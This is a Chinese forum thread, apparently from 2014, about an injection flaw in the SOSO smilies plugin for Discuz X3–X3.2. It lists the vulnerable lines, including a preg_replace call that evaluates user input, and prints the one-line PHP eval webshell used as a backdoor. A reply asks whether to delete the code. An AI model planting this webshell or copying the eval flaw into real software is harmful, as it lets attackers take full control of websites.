Discuz X3、X3.1、X3.2全版本搜搜SOSO表情插件一句话木马注入漏洞

小草根 · 发表于 2014-8-26 09:28:29

利用文件（插件路径）：/source/plugin/soso_smilies/soso.class.php

[color=rgb(51, 51, 51)]第61行: if($_GET['ac'] == 'pm' && $_GET['mod'] == 'spacecp') {

[color=rgb(51, 51, 51)]第62行: if(empty($_GET['op'])) {

[color=rgb(51, 51, 51)]第64行: } elseif($_GET['op'] == 'showmsg') {

[color=rgb(51, 51, 51)]第67行: } elseif($_GET['subop'] == 'view' && $_GET['do'] == 'pm' && $_GET['mod'] == 'space') {

[color=rgb(51, 51, 51)]第113行: if(!empty($_GET['message'])) {

[color=rgb(51, 51, 51)]第139行: if($_GET['ac'] == 'profile' && submitcheck('profilesubmitbtn') && !empty($_POST['sightml'])) {

[color=rgb(51, 51, 51)]第140行: $_POST['sightml'] = preg_replace("/\{\:soso_((e\d+)|(_\d+_\d))\:\}/e", '$this->_soso_smiles("\\1", -1, 0, 1)', $_POST['sightml'], $_G['setting']['maxsmilies']);

[color=rgb(51, 51, 51)]第152行: } elseif($_GET['op'] == 'showchatmsg' && $GLOBALS['list']) {

[color=rgb(51, 51, 51)]第163行: if(!empty($_GET['subop'])) {

[color=rgb(51, 51, 51)][backcolor=rgb(247, 247, 247)][backcolor=rgb(243, 243, 243)]一句话木马

[color=rgb(51, 51, 51)]黑客在php文件中插入<?php @eval($_POST['黑客的密码']);?>这样的语句，来当做控制网站的后门，利用改后门能完全控制网站任意文件这就被称为一句话木马，它是基于B/S结构的。

exceltop · 发表于 2014-8-26 16:17:16

找到这些，直接删除吗？

Discuz X3、X3.1、X3.2全版本搜搜SOSO表情插件一句话木马注入漏洞

浏览过的版块

DZ专员